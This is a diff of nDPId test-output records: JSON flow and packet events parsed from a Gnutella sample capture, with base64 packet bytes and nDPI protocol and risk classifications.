-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UChAAIAGv8kKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07j1AAIAGRpsKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":88622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88622,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03zxAAIAGuFcKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA05t5AAIAGvPEKAAIPaJziSMRs0ArGWKhyAAAAAIAC+vAZ6QAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88704,"flow_last_seen":88704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88704,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":88704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88704,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cchAAIAGzAoKAAIPS4VlXcRtzI\/Cd\/CCAAAAAIAC+vBzNgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88705,"flow_last_seen":88705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88705,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":88705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88705,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNJAAIAG5KYKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88706,"flow_last_seen":88706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":88706,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.215.130.156","src_port":50287,"dst_port":12405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":88706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88706,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYJAAIAGx78KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":88816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88816,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAyoAAEAGurFLhWVdCgACD8yPxG0AoxYBwnfwg2AS\/\/+AiAAAAgQFtA=="} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":88816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88816,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocclAAIAGzBUKAAIPS4VlXcRtzI\/Cd\/CDAKMWAlAQ+vCdVAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":88832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88832,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAywAAEAGIK1onOJICgACD9AKxGwApBABxlioc2AS\/\/8tOgAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":88832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88832,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5t9AAIAGvPwKAAIPaJziSMRs0ArGWKhzAKQQAlAQ+vBKBgAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83805,"flow_last_seen":83805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":83805,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":83805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":83805,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8ZAAIAGrlAKAAIPcfxWosRbJBfMcOElAAAAAIAC+vAJaQAAAgQFtAEDAwgBAQQC"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":84026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84026,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwcAAEAGoxhx\/FaiCgACDyQXxFsAmFgBzHDhJmAS\/\/\/UxQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":84026,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84026,"pkt":"UlQAEjUCCAAn5uVZCABFAAAod8dAAIAGrlsKAAIPcfxWosRbJBfMcOEmAJhYAlAQ+vDxkQAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83805,"flow_last_seen":84027,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84027,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYlAAIAGqN4KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOhAAIAGV+wKAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":3,"flow_last_seen":84388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84388,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsdAAIAGE84KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0v8BAAIAGYs4KAAIP0tH5VMRcYK9pfUzQAAAAAIAC+vDAkAAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84592,"flow_last_seen":84592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84592,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":84592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84592,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sD9AAIAG2QsKAAIP2meLAsRdDHIwnISEAAAAAIAC+vB8tgAAAgQFtAEDAwgBAQQC"} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.27.24.95","src_port":50270,"dst_port":11427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0y5JAAIAGmKgKAAIPchsYX8ReLKPFX+7aAAAAAIAC+vA4WgAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":84593,"flow_last_seen":84593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":84593,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.198.27","src_port":50271,"dst_port":60202,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":84593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":84593,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KpdAAIAGI14KAAIP2qTGG8Rf6yo8NHW4AAAAAIAC+vBl2QAAAgQFtAEDAwgBAQQC"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":84824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84824,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAwwAAEAGn4vS0flUCgACD2CvxFwAmkwBaX1M0WAS\/\/+X6wAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":84824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84824,"pkt":"UlQAEjUCCAAn5uVZCABFAAAov8FAAIAGYtkKAAIP0tH5VMRcYK9pfUzRAJpMAlAQ+vC0twAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":84825,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":84862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":84862,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAw4AAEAGBkbaZ4sCCgACDwxyxF0Am0YBMJyEhWAS\/\/9aEAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":84863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":84863,"pkt":"UlQAEjUCCAAn5uVZCABFAAAosEBAAIAG2RYKAAIP2meLAsRdDHIwnISFAJtGAlAQ+vB23AAA"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":84592,"flow_last_seen":84863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":84863,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07jxAAIAGRpwKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0AtdAAIAGwDkKAAIPGLMS8sRhuOFovA6\/AAAAAIAC+vBHrQAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03ztAAIAGuFgKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85608,"flow_last_seen":85608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":50275,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":85608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85608,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UCdAAIAGv8oKAAIPenVkTsRjIzKhF7fWAAAAAIAC+vBIyQAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":86639,"flow_last_seen":86639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":86639,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":50276,"dst_port":56070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 